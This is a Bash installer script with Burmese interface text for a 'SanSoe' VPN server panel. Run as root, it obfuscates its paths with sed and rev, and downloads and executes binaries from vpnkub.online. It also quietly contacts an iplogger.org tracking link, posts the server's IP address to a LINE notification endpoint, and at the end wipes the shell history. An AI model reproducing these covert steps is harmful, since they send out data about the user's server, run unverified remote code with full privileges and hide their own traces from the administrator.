#!/bin/bash
clear
MYIP2="s/xxxxxxxxx/$MYIP/g";
MYIP=$(wget -qO- icanhazip.com);
[[ "$(whoami)" != "root" ]] && {
echo -e "\033[1;33m[\033[1;31mErro\033[1;33m] \033[1;37m- \033[1;33mသင်၏ VPS ဆာ‌ဗာသည် root ဖြစ်ရန်လိုအပ်သည်။\033[0m"
rm $HOME/Plus > /dev/null 2>&1; exit 0
}
_lnk=$(echo 'z1:y#x.5s0ul&p4hs$s.0a72d*n-e!v89e032:3r'| sed -e 's/[^a-z.]//ig'| rev); _Ink=$(echo '/3×u3#s87r/l32o4×c1a×l1/83×l24×i0b×'|sed -e 's/[^a-z/]//ig'); _1nk=$(echo '/3×u3#s×87r/83×l2×4×i0b×'|sed -e 's/[^a-z/]//ig')
cd $HOME
fun_bar () {
comando[0]="$1"
comando[1]="$2"
(
[[ -e $HOME/fim ]] && rm $HOME/fim
${comando[0]} -y > /dev/null 2>&1
${comando[1]} -y > /dev/null 2>&1
touch $HOME/fim
) > /dev/null 2>&1 &
tput civis
echo -ne "  \033[1;33mခဏစောင့်ပါဦး \033[1;37m- \033[1;33m["
while true; do
for((i=0; i<18; i++)); do
echo -ne "\033[1;31m#"
sleep 0.1s
done
[[ -e $HOME/fim ]] && rm $HOME/fim && break
echo -e "\033[1;33m]"
sleep 1s
tput cuu1
tput dl1
echo -ne "  \033[1;33mခဏစောင့်ပါဦး \033[1;37m- \033[1;33m["
done
echo -e "\033[1;33m]\033[1;37m -\033[1;32m OK !\033[1;37m"
tput cnorm
}
function verif_key () {
krm=$(echo '5:q-3gs2.o7%8:1'|rev); chmod +x $_Ink/list > /dev/null 2>&1
[[ ! -e "$_Ink/list" ]] && {
echo -e "\n\033[1;31mသော့သည် မမှန်ပါ\033[0m"
rm -rf $HOME/Plus > /dev/null 2>&1
sleep 2
clear; exit 1
}
}
echo -e "\033[1;31m════════════════════════════════════════════════════\033[0m"
tput setaf 7 ; tput setab 4 ; tput bold ; printf '%40s%s%-12s\n' " SanSoe AUTO SCRIPT       " ; tput sgr0
echo -e "\033[1;31m════════════════════════════════════════════════════\033[0m"
echo ""
echo -e "             \033[1;31mသတိထား! \033[1;33mဒီ script က !\033[0m"
echo ""
echo -e "\033[1;31m• \033[1;33mscript package ကို VPN ဆာဗာတူးလ်အဖြစ် ထည့်သွင်းပါ\033[0m"
echo -e "\033[1;33m  စာလုံးများကို ထင်ရှားပေါ်လွင်စေရန် အမှောင်‌အရောင်ကို အသုံးပြုပါ, by SanSoe\033[0m"
echo ""
echo -e "\033[1;32m• \033[1;သတိပေး! \033[1;33mဤScriptကို ဝယ်ပြီး\033[0m"
echo -e "\033[1;33m  မည်သူ့ကိုမျှ ပြန်လည်ရောင်းချခြင်း ခွင့်မပြုပါ\033[0m"
echo ""
echo -e "\033[1;31m≠×≠×≠×≠×≠×≠×≠×[\033[1;33m • \033[1;32mEDIT:@SanSoe\033[1;33m •\033[1;31m ]≠×≠×≠×≠×≠×≠×≠×\033[0m"
echo ""
#-----------------------------------------------------------------------------------------------------------------
echo -ne "\033[1;36mဆက်လုပ်ရန် S လို့ ရေးပါ [N/S]: \033[1;37m"; read x
[[ $x = @(n|N) ]] && exit
sed -i 's/Port 22222/Port 22/g' /etc/ssh/sshd_config  > /dev/null 2>&1
service ssh restart  > /dev/null 2>&1
echo -e "\n\033[1;36mဆန်းစစ်နေသည် ... \033[1;37m 16983:16085\033[0m" ; rm $_Ink/list > /dev/null 2>&1; wget -P $_Ink https://vpnkub.online/script/spnet/Install/list > /dev/null 2>&1; verif_key
sleep 3s
echo "/bin/menu" > /bin/h && chmod +x /bin/h > /dev/null 2>&1
rm versao* > /dev/null 2>&1
wget https://vpnkub.online/script/spnet/Install/versao > /dev/null 2>&1
> /dev/null 2>&1
wget https://iplogger.org/2lHZ43 > /dev/null 2>&1
> /dev/null 2>&1
rm 2lHZ43 > /dev/null 2>&1
cd /bin/ > /dev/null 2>&1
rm v2raymanager > /dev/null 2>&1
wget https://vpnkub.online/script/spnet/Modulos/v2raymanager > /dev/null 2>&1
chmod 777 v2raymanager > /dev/null 2>&1
cd > /dev/null 2>&1
#-----------------------------------------------------------------------------------------------------------------
echo -e "\n\033[1;32mအရေးကြီးသည်၊ ရွေးပါ !\033[1;32m"
sleep 1s
echo ""
[[ -f "$HOME/usuarios.db" ]] && {
clear
echo -e "\n\033[0;34m═════════════════════════════════════════════════\033[0m"
echo ""
echo -e "                 \033[1;33m• \033[1;31mคำเตือน \033[1;33m• \033[0m"
echo ""
echo -e "\033[1;33mအသုံးပြုသူဒေတာဘေစ့် \033[1;32m(usuarios.db) \033[1;33mသူက"
echo -e "တွေ့ပြီ!ကန့်သတ်ချက်များကို သိမ်းဆည်းထားလိုသည်"
echo -e "အသုံးပြုသူ၏ ဆန္ဒ"
echo -e "ဒေတာဘေ့စ်အသစ် ဖန်တီးမလား\033[0m"
echo -e "\n\033[1;37m[\033[1;31m1\033[1;37m] \033[1;33mဒေတာဘေ့စ်ကိုလက်ရှိထားပါ\033[0m"
echo -e "\033[1;37m[\033[1;31m2\033[1;37m] \033[1;33mဒေတာဘေ့စ်အသစ်တစ်ခုဖန်တီးပါ\033[0m"
echo -e "\n\033[0;34m═════════════════════════════════════════════════\033[0m"
echo ""
tput setaf 2 ; tput bold ; read -p "Opção ?: " -e -i 1 optiondb ; tput sgr0
} || {
awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
}
[[ "$optiondb" = '2' ]] && awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
tput setaf 7 ; tput setab 4 ; tput bold ; printf '%35s%s%-18s\n' " စနစ်ထည့်သွင်းခြင်းကို စောင့်ဆိုင်းနေပါသည် UI....." ; tput sgr0
echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32mစနစ်ထည့်သွင်း‌နေသည်..... \033[1;33m[\033[1;31m!\033[1;33m]\033[0m"
echo ""
echo -e "    \033[1;33mပက်ကေ့ဂျ်ကို ထည့်သွင်းနေသည်၊ ကျေးဇူးပြု၍ စောင့်ပါ....!\033[0m"
echo ""
fun_attlist () {
apt-get update -y
[[ ! -d /usr/share/.plus ]] && mkdir /usr/share/.plus
echo "crz: $(date)" > /usr/share/.plus/.plus
}
fun_bar 'fun_attlist'
clear
echo ""
echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32mပက်ကေ့ဂျ်များ တပ်ဆင်ခြင်း\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
echo ""
echo -e "\033[1;33mပင်မစနစ် တပ်ဆင်ခြင်း..... !\033[0m"
echo ""
inst_pct () {
_pacotes=("bc" "screen" "nano" "unzip" "lsof" "netstat" "net-tools" "dos2unix" "nload" "jq" "curl" "figlet" "python3" "python-pip")
for _prog in ${_pacotes[@]}; do
apt install $_prog -y
done
pip install speedtest-cli
}
fun_bar 'inst_pct'
[[ -f "/usr/sbin/ufw" ]] && ufw allow 443/tcp ; ufw allow 80/tcp ; ufw allow 3128/tcp ; ufw allow 8799/tcp ; ufw allow 8080/tcp
clear
echo ""
echo -e "              \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32mတပ်ဆင်ခြင်း \033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
echo ""
echo -e "      \033[1;33mလုပ်ဆောင်ချက်များနှင့် အချက်အလက်များ အပြည့်အစုံ! \033[0m"
echo ""
fun_bar "$_Ink/list $_lnk $_Ink $_1nk $key"
clear
IP=$(wget -qO- ipv4.icanhazip.com);
curl -X POST -H 'Authorization: Bearer ' -F 'message='" 
เซิฟเวอร์  $IP "'' https://notify-api.line.me/api/notify > /dev/null 2>&1
conexao
echo ""
cd $HOME
echo -e "        \033[1;33m • \033[1;32mတပ်ဆင်မှု ပြီးပါပြီ...\033[1;33m • \033[0m"
echo ""
echo -e "\033[1;31m \033[1;33mဆက်လက်လုပ်ဆောင်ရန် menu လို့ ရိုက်ထည့်ပါ : \033[1;32mmenu\033[0m"
echo -e "\033[1;33m ပိုမိုသိရှိလိုပါက၊ စီမံခန့်ခွဲသူကို ဆက်သွယ်ပါ San Soe \033[1;31m(\033[1;36mTELEGRAM\033[1;31m): \033[1;37mhttps://t.me/sansoe2021\033[0m"
rm $HOME/Plus && cat /dev/null > ~/.bash_history && history -c

